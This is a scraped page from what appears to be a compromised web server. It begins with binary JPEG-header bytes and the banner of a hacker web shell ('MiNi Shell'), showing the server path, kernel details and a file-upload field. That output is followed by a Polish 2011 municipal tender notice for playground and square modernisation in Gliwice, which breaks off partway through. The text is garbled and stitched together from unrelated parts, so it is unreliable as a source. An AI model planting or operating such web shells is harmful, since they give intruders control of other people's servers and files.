JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110401/60996-N-2011.html

<p class="kh_header"><b>Gliwice: Modernizacja skweru Nacka wraz z placem zabaw, placu zabaw przy ul. Derkacza, placu zabaw przy ul. Gagarina, budowa placu zabaw przy ul. Planetarnej - Piaskowej zgodnie z projektami budowlano-wykonawczymi</b><br>
<b>Numer ogłoszenia: 60996 - 2011; data zamieszczenia: 01.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Usług Komunalnych , ul. Strzelców Bytomskich 25c, 44-109 Gliwice, woj. śląskie, tel. 032 2310031, 3350444, faks 032 2310032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzuk.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Budżetowa Samorządu Terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja skweru Nacka wraz z placem zabaw, placu zabaw przy ul. Derkacza, placu zabaw przy ul. Gagarina, budowa placu zabaw przy ul. Planetarnej - Piaskowej zgodnie z projektami budowlano-wykonawczymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane
A. Zagospodarowanie skweru Nacka
1. Zagospodarowanie skweru Nacka.
2. Ogrodzenie placu zabaw.
3. Odgrodzenie boiska od ulicy.
4. Mała architektura i zieleń.
Inwestycja swoim zakresem obejmować będzie:
1.	Roboty pomiarowe,
2.	Roboty rozbiórkowe,
3. Roboty przygotowawcze i ziemne,
4. Roboty murowe,
5. Rozbiórka starych alejek,
6. Podbudowy pod chodniki, ciągi komunikacyjne, 
7. Nawierzchnie z kostki brukowej, 
8. Demontaż ławek i koszy, transport w miejsce wskazane przez Zamawiającego,
9. Montaż ławek (21 szt. na terenie parku i 6 szt. na terenie placu zabaw).) i koszy (21 szt. na terenie parku i 7 szt. na terenie placu zabaw) dostarczonych przez Zamawiającego w miejscach wcześniej przygotowanych. Miejsca montażu ławek i koszy zostaną wskazane przez Zamawiającego w trakcie budowy,
10. Wykonanie ogrodzenia placu zabaw - ogrodzenie z paneli wraz z montażem furtek z samozamykaczem i przęsła technicznego (rysunek AB_5 - zmiana wysokości ogrodzenia na 120 cm - zgodnie z projektem firmy SMM A. Matuszczak),
Ogrodzenie winno być wykonane wg poniższych wytycznych:
a. Przęsło ogrodzeniowe wykonane w formie kraty o wymiarach oczka 50 x 200 mm.
Dane techniczne przęsła:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręty stalowe min. 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-ilość przęseł wg.projektu.
Dane techniczne przęsła z tablicą edukacyjną:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręt stalowy 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-tablica edukacyjna montowana w przęśle, wymiar tablicy 2155x600 mm, malowana z jednej 
strony farbą tzw.tablicową w kolorze ciemno-zielonym lub alternatywnie ciemno-szarym 
matowym. Druga strona tablicy pomalowana na kolorowo w elementy bajkowe.
-ilość 4szt.
b. Słupki panelowe wykonane z profilu zamkniętego o wymiarze 60x40 mm,
-długość minimum 1800 mm, zamknięte u góry kapturkami plastikowymi - wewnętrznymi.
c. Słupek panelowy do szybkiego demontażu .
d. Furtka wejściowa na plac zabaw samozamykająca o wymiarach:
- wysokość 1200 mm,
- szerokość 1200 mm,
Wszystkie elementy wymienione w opisie powinny być ocynkowane oraz pomalowane proszkowo w czterech kolorach, wskazanych przez Zamawiającego w ilościach po 1 4 z każdego koloru.
11. Wykonanie ogrodzenia boiska od strony ul. Toszeckiej,
12. Założenie nowych trawników dywanowych na terenie całego skweru (także w miejscu zdemontowanych alejek) z siewu z nawiezieniem ziemi urodzajnej i z pielęgnacją w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
13. Zakup i transport ziemi do wykonania trawników i nasadzeń,
14. Nasadzenia i roboty pielęgnacyjne w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
15. Wycinka drzew po stronie Zamawiającego.
Uwaga: opis materiału roślinnego zamieszczony w załączniku A. 
Uwaga: usuwa się z przedmiaru robót (modernizacja skweru) pozycje: 9.d.1, 10.d.1, 16.d.2, 37.d.3 i 38.d.3

B. Modernizację placu zabaw skwer Nacka w Gliwicach
1. Modernizacja placu zabaw.
2. Montaż urządzeń zabawowych.
Inwestycja swoim zakresem obejmować będzie:
1. Roboty pomiarowe,
2. Roboty rozbiórkowe,
3. Roboty przygotowawcze i ziemne,
4. Podbudowy pod chodniki
5. Nawierzchnie z kostki brukowej,
6. Pole piaskowe,
7. Nawierzchnia z płyt gumowych - płyty min. 50 x 50 cm.
8. Demontaż ławek i koszy, transport w miejsce wskazane przez Zamawiającego,
9. Montaż ławek (6 szt.) i koszy (7 szt.) dostarczonych przez Zamawiającego w miejscach wcześniej przygotowanych. 
10. Demontaż istniejących elementów placu zabaw oraz transport w miejsce wskazane przez Zamawiającego.
11. Montaż urządzeń: zestaw integracyjny 1 szt., huśtawka podwójna 1szt., huśtawka wagowa 1szt., bujak 4-osob.1szt., karuzela tarczowa 1szt., piaskownica 1szt., stojak na rowery 4 stanowiskowy 2szt., tablica informacyjna z regulaminem 2szt,. Treść regulaminu dostarczy Zamawiający. Zamontowanie urządzeń zgodnie z projektem pod kątem wymiarów, funkcji i z zachowaniem wyznaczonych w projekcie stref bezpieczeństwa. Urządzenia muszą posiadać certyfikaty zgodności PN-1176.
12. Gwarancja na urządzenia oraz nawierzchnie - 36 miesięcy od daty podpisania protokołu odbioru robót. 
13. Założenie nowych trawników dywanowych z siewu z nawiezieniem ziemi urodzajnej i z pielęgnacją w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
14. Zakup i transport ziemi do wykonania trawników.
Uwaga: usuwa się z projektu rysunki dotyczące montażu oraz wykonania ogrodzenia. Ogrodzenie ujęto w projekcie modernizacji skweru Nacka.

C. Modernizację placu zabaw przy ul. Derkacza w Gliwicach
Przedmiotem zamówienia są roboty budowlane, w tym:
1. Modernizacja placu zabaw.
2. Montaż urządzeń zabawowych.
Inwestycja swoim zakresem obejmować będzie:
1 Roboty pomiarowe,
2 Roboty rozbiórkowe,
3 Roboty przygotowawcze i ziemne,
4 Podbudowy pod chodniki,
5 Nawierzchnie z kostki brukowej,
6 Pole piaskowe,
7 Nawierzchnia z płyt gumowych - płyty min. 50 x 50 cm.
8 Demontaż ławek i koszy, transport w miejsce wskazane przez Zamawiającego,
9 Montaż ławek (8 szt.) i koszy (8 szt.) dostarczonych przez Zamawiającego w miejscach wcześniej przygotowanych. 
10 Demontaż istniejących elementów placu zabaw oraz transport w miejsce wskazane przez Zamawiającego.
11 Montaż urządzeń: zestaw integracyjny 1 szt., huśtawka podwójna 1szt., huśtawka wagowa 1szt., bujak pojedynczy 2szt., karuzela tarczowa 1szt., piaskownica 1szt., stojak na rowery 4 stanowiskowy 2szt., tablica informacyjna z regulaminem 2szt, przeplotnia łukowa 1szt. Treść regulaminu dostarczy Zamawiający. Zamontowanie urządzeń zgodnie z projektem pod kątem wymiarów, funkcji i z zachowaniem wyznaczonych w projekcie stref bezpieczeństwa. Urządzenia muszą posiadać certyfikaty zgodności PN-1176.
12 Gwarancja na urządzenia oraz nawierzchnie - 36 miesięcy od daty podpisania protokołu odbioru robót. 
13 Założenie nowych trawników dywanowych z siewu z nawiezieniem ziemi urodzajnej i z pielęgnacją w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
14 Zakup i transport ziemi do wykonania trawników.
15 Montaż ogrodzenia z ceownika zimnogiętego na słupkach wraz z bramkami wejściowymi samozamykającymi według projektu.
Ogrodzenie winno być wykonane wg poniższych wytycznych:
a. Przęsło ogrodzeniowe wykonane w formie kraty o wymiarach oczka 50 x 200 mm.
Dane techniczne przęsła:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręty stalowe min. 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-ilość przęseł wg.projektu.
Dane techniczne przęsła z tablicą edukacyjną:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręt stalowy 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-tablica edukacyjna montowana w przęśle, wymiar tablicy 2155x600 mm, malowana z jednej 
strony farbą tzw.tablicową w kolorze ciemno-zielonym lub alternatywnie ciemno-szarym 
matowym. Druga strona tablicy pomalowana na kolorowo w elementy bajkowe.
-ilość 4szt.
b. Słupki panelowe wykonane z profilu zamkniętego o wymiarze 60x40 mm,
-długość minimum 1800 mm, zamknięte u góry kapturkami plastikowymi - wewnętrznymi.
c. Słupek panelowy do szybkiego demontażu .
d. Furtka wejściowa na plac zabaw samozamykająca o wymiarach:
- wysokość 1200 mm,
- szerokość 1200 mm,
Wszystkie elementy wymienione w opisie powinny być ocynkowane oraz pomalowane proszkowo w czterech kolorach, wskazanych przez Zamawiającego w ilościach po 1 4 z każdego koloru

D. Modernizację placu zabaw przy ul. Gagarina w Gliwicach
Przedmiotem zamówienia są roboty budowlane, w tym:
1.Modernizacja placu zabaw.
2.Montaż urządzeń zabawowych.
Inwestycja swoim zakresem obejmować będzie:
1. Roboty pomiarowe,
2. Roboty rozbiórkowe,
3. Roboty przygotowawcze i ziemne,
4. Podbudowy pod chodniki
5. Nawierzchnie z kostki brukowej,
6. Pole piaskowe,
7. Nawierzchnia z płyt gumowych - płyty min. 50 x 50 cm.
8. Demontaż ławek i koszy, transport w miejsce wskazane przez Zamawiającego,
9. Montaż ławek (8 szt.) i koszy (8 szt.) dostarczonych przez Zamawiającego w miejscach wcześniej przygotowanych. 
10. Demontaż istniejących elementów placu zabaw oraz transport w miejsce wskazane przez Zamawiającego.
11. Montaż urządzeń: zestaw integracyjny 1 szt., huśtawka podwójna 1szt., huśtawka wagowa 1szt., bujak pojedynczy 2szt., karuzela tarczowa 1szt., piaskownica 1szt., stojak na rowery 4 stanowiskowy 2szt., tablica informacyjna z regulaminem 2szt, przeplotnia łukowa 1szt. Treść regulaminu dostarczy Zamawiający. Zamontowanie urządzeń zgodnie z projektem pod kątem wymiarów, funkcji i z zachowaniem wyznaczonych w projekcie stref bezpieczeństwa. Urządzenia muszą posiadać certyfikaty zgodności PN-1176.
12. Gwarancja na urządzenia oraz nawierzchnie - 36 miesięcy od daty podpisania protokołu odbioru robót. 
13. Założenie nowych trawników dywanowych z siewu z nawiezieniem ziemi urodzajnej i z pielęgnacją w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
14. Zakup i transport ziemi do wykonania trawników.
15. Montaż ogrodzenia z ceownika zimnogiętego na słupkach wraz z bramkami wejściowymi samozamykającymi     według projektu.
Ogrodzenie winno być wykonane wg poniższych wytycznych:
a. Przęsło ogrodzeniowe wykonane w formie kraty o wymiarach oczka 50 x 200 mm.
Dane techniczne przęsła:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręty stalowe min. 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-ilość przęseł wg.projektu.
Dane techniczne przęsła z tablicą edukacyjną:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręt stalowy 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-tablica edukacyjna montowana w przęśle, wymiar tablicy 2155x600 mm, malowana z jednej 
strony farbą tzw.tablicową w kolorze ciemno-zielonym lub alternatywnie ciemno-szarym 
matowym. Druga strona tablicy pomalowana na kolorowo w elementy bajkowe.
-ilość 4szt.
b. Słupki panelowe wykonane z profilu zamkniętego o wymiarze 60x40 mm,
-długość minimum 1800 mm, zamknięte u góry kapturkami plastikowymi - wewnętrznymi.
c. Słupek panelowy do szybkiego demontażu .
d. Furtka wejściowa na plac zabaw samozamykająca o wymiarach:
- wysokość 1200 mm,
- szerokość 1200 mm,
Wszystkie elementy wymienione w opisie powinny być ocynkowane oraz pomalowane proszkowo w czterech kolorach, wskazanych przez Zamawiającego w ilościach po 1 4 z każdego koloru.

E. Budowę placu zabaw przy ul. Planetarnej - Piaskowej w Gliwicach
Przedmiotem zamówienia są roboty budowlane, w tym:
1. Modernizacja placu zabaw.
2.Montaż urządzeń zabawowych.
Inwestycja swoim zakresem obejmować będzie:
1 Roboty pomiarowe,
2 Roboty rozbiórkowe,
3. Roboty przygotowawcze i ziemne,
4. Podbudowy pod chodniki
5. Nawierzchnie z kostki brukowej,
6. Pole piaskowe,
7. Nawierzchnia z płyt gumowych - płyty min. 50 x 50 cm.
8. Demontaż ławek i piaskownicy.
9. Montaż ławek (7 szt.) i koszy (7 szt.) dostarczonych przez Zamawiającego w miejscach wcześniej przygotowanych. 
10. Montaż urządzeń: zestaw integracyjny 1 szt., huśtawka podwójna 2szt., huśtawka wagowa 1szt., bujak pojedynczy 1szt., bujak 4-osob.1szt., karuzela tarczowa 1szt., piaskownica 1szt., stojak na rowery 4 stanowiskowy 2szt., tablica informacyjna z regulaminem 2szt, przeplotnia łukowa 1szt. Treść regulaminu dostarczy Zamawiający. Zamontowanie urządzeń zgodnie z projektem pod kątem wymiarów, funkcji i z zachowaniem wyznaczonych w projekcie stref bezpieczeństwa. Urządzenia muszą posiadać certyfikaty zgodności PN-1176.
11. Gwarancja na urządzenia oraz nawierzchnie - 36 miesięcy od daty podpisania protokołu odbioru robót. 
12. Założenie nowych trawników dywanowych z siewu z nawiezieniem ziemi urodzajnej i z pielęgnacją w okresie gwarancyjnym - 12 miesięcy od daty podpisania protokołu odbioru robót,
13. Zakup i transport ziemi do wykonania trawników.
15. Montaż ogrodzenia z ceownika zimnogiętego na słupkach wraz z bramkami wejściowymi samozamykającymi     według projektu.
Ogrodzenie winno być wykonane wg poniższych wytycznych:
a. Przęsło ogrodzeniowe wykonane w formie kraty o wymiarach oczka 50 x 200 mm.
Dane techniczne przęsła:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręty stalowe min. 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-ilość przęseł wg.projektu.
Dane techniczne przęsła z tablicą edukacyjną:
-elementy poziome: profil zamknięty lub ceownik zimnowalcowany,
-elementy pionowe: pręt stalowy 6 mm,
-wysokość przęsła 1200 mm,
-szerokość przęsła 2400 mm,
-tablica edukacyjna montowana w przęśle, wymiar tablicy 2155x600 mm, malowana z jednej 
strony farbą tzw.tablicową w kolorze ciemno-zielonym lub alternatywnie ciemno-szarym 
matowym. Druga strona tablicy pomalowana na kolorowo w elementy bajkowe.
-ilość 4szt.
b. Słupki panelowe wykonane z profilu zamkniętego o wymiarze 60x40 mm,
-długość minimum 1800 mm, zamknięte u góry kapturkami plastikowymi - wewnętrznymi.
c. Słupek panelowy do szybkiego demontażu .
d. Furtka wejściowa na plac zabaw samozamykająca o wymiarach:
- wysokość 1200 mm,
- szerokość 1200 mm,
Wszystkie elementy wymienione w opisie powinny być ocynkowane oraz pomalowane proszkowo w czterech kolorach, wskazanych przez Zamawiającego w ilościach po 1 4 z każdego koloru.

Itntegralną częścią niniejszej specyfikacji są:
1.	Projekty budowlano - wykonawcze,
2.	Przedmiary robót,
3.	Specyfikacja techniczna wykonania i odbioru robót budowlanych, elektrycznych oraz sanitarnych
Uwaga: Wszystkie elementy składowe dokumentacji, tj. opis techniczny, część rysunkowa, specyfikacja techniczna, przedmiar robót, stanowią komplet. Przy sporządzaniu oferty przetargowej oraz realizacji przedmiotu zamówienia, wszystkie elementy dokumentacji należy rozpatrywać łącznie. Podane w przedmiarach podstawy wyceny nie są zobowiązujące dla Wykonawcy. 
Istotne warunki zamówienia:
1. Przed przystąpieniem do robót należy wykonać wykopy kontrolne. Wykopy te należy wykonać miejscu robót fundamentowych, w których mogą występować skrzyżowania oraz zbliżenia z istniejącymi instalacjami podziemnymi. Roboty ziemne należy wykonać z zachowaniem szczególnej ostrożności w miejscach występowania uzbrojenia.
2. Zachowanie szczególnej ostrożności w trakcie wykonywania prac w obrębie istniejącego drzewostanu oraz systemów korzeniowych drzew. W razie potrzeby prace w sąsiedztwie korzeni wykonywać ręcznie.
3. Wykonawca jest zobowiązany do uzyskania zezwolenia zarządcy drogi na prowadzenie robót w pasie drogowym, oraz zatwierdzić w ZDM projekt organizacji i zabezpieczenia robót w pasie drogowym.
4. Roboty należy prowadzić pod nadzorem wszystkich jednostek odpowiedzialnych za istniejące uzbrojenie terenu.
Uwaga:  Koszt nadzorów należy ująć w ofercie cenowej.
5.   Do wykonania robót należy stosować materiały określone w specyfikacji technicznej, posiadające certyfikat na znak bezpieczeństwa i deklaracje zgodności z PN lub Aprobatą Techniczną.
6. Wykonawca po zakończeniu robót zobowiązany jest do sporządzenia dokumentacji powykonawczej.
7. Odbiór końcowy zostanie dokonany przez Komisję wyznaczoną przez Zamawiającego 
z udziałem Wykonawcy. Komisja dokona oceny jakości wykonanych robót na podstawie przedstawionych dokumentów, oceny wizualnej oraz zgodności wykonania robót z projektem wykonawczym,  specyfikacją techniczną oraz  przedmiarami robót.
8.    Z odbioru zostanie sporządzony protokół odbioru robót.
Do odbioru Wykonawca zobowiązany jest przedstawić następujące dokumenty:
- operat powykonawczy geodezyjny z naniesieniem na zasoby mapowe Wydz. Geodezji UM w Gliwicach, 
- certyfikaty i deklaracje zgodności  na materiały i urządzenia zastosowane do wykonania robót,
- protokoły z pomiarów i badań,
- oświadczenie kierownika budowy o zgodności wykonani obiektu budowlanego z projektem budowlanym,
- dziennik budowy,
- dokumentację powykonawczą,
- instrukcje eksploatacji i konserwacji urządzeń, DTR, oraz gwarancje producentów urządzeń,
- certyfikaty i dokumentacje potwierdzające zgodność urządzeń i nawierzchni z normami PN-EN1176 i PN-EN 1177,
- zestaw narzędzi do naprawy i konserwacji urządzeń zabawowych.
W czasie realizacji robót Wykonawca zobowiązany jest do:
1.	Stałego utrzymania porządku i ładu na terenie budowy, 
2.	Oznakowania i odpowiedniego zabezpieczenia materiałów niezbędnych do wykonania prac,
3.	Wykonywania prac w godzinach od 600 do 1800 w dni robocze oraz od 600 do 1500 w sobotę,
4.	Bieżącego wywozu odpadów i gruzu pochodzącego z rozbiórek,
5.	Oznakowania i zabezpieczenia miejsc prowadzenie robót zgodnie z obowiązującymi przepisami BHP,
6.	Udziału w odbiorach robót zanikających, ulegających zakryciu, odbiorach częściowych i udziału 
w odbiorze końcowym.
Wykonawca zobowiązany jest do zapoznania się z Polityką Bezpieczeństwa Pracy oraz Polityką Środowiskową obowiązującymi w MZUK.*
Wykonawca zobowiązany jest do stosowania zasad środowiskowych, bezpieczeństwa i higieny pracy dla dostawców towarów, usług i robót budowlanych obowiązujących w MZUK.*
* - dokumenty dostępne na stronie internetowej www.mzuk.gliwice.pl pod hasłem Certyfikat ISO..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający wymaga wniesienia wadium:
dla części I - skweru Nacka 15 000,00
dla części II - plac zabaw przy ul. Derkacza 5 000,00
dla część III - plac zabaw przy ul. Gagarina 5 000,00
dla części IV - plac zabaw przy ul. Planetarnej - Piaskowej 3 000,00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się wykonawcy którzy posiadają uprawnienia do realizacji zamówienia, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- o zamówienie  w części I mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej trzy roboty budowlane o zbliżonym zakresie, o wartości nie mniejszej niż 400 000 zł brutto każda,
- - o zamówienie  w części II mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej trzy roboty budowlane o zbliżonym zakresie, o wartości nie mniejszej niż 100 000 zł brutto każda,
- - o zamówienie  w części III mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej trzy roboty budowlane o zbliżonym zakresie, o wartości nie mniejszej niż 100 000 zł brutto każda,
- - o zamówienie  w części IV mogą ubiegać się wykonawcy, którzy w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej trzy roboty budowlane o zbliżonym zakresie, o wartości nie mniejszej niż 60 000 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się wykonawcy, których potencjał techniczny pozwoli na prawidłowe wykonanie zamówienia, w szczególności o zamówienie mogą ubiegać się wykonawcy którzy dysponują odpowiednimi narzędziami, wyposażeniem i urządzeniami niezbędnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia. W szczególności dysponują:
A. Personel kierowniczy:
- minimum jeden kierownik budowy - posiadający uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, będący członkiem Okręgowej Izby Inżynierów Budownictwa - kiedy wykonawca ubiega się o jedną lub dwie części zamówienia,
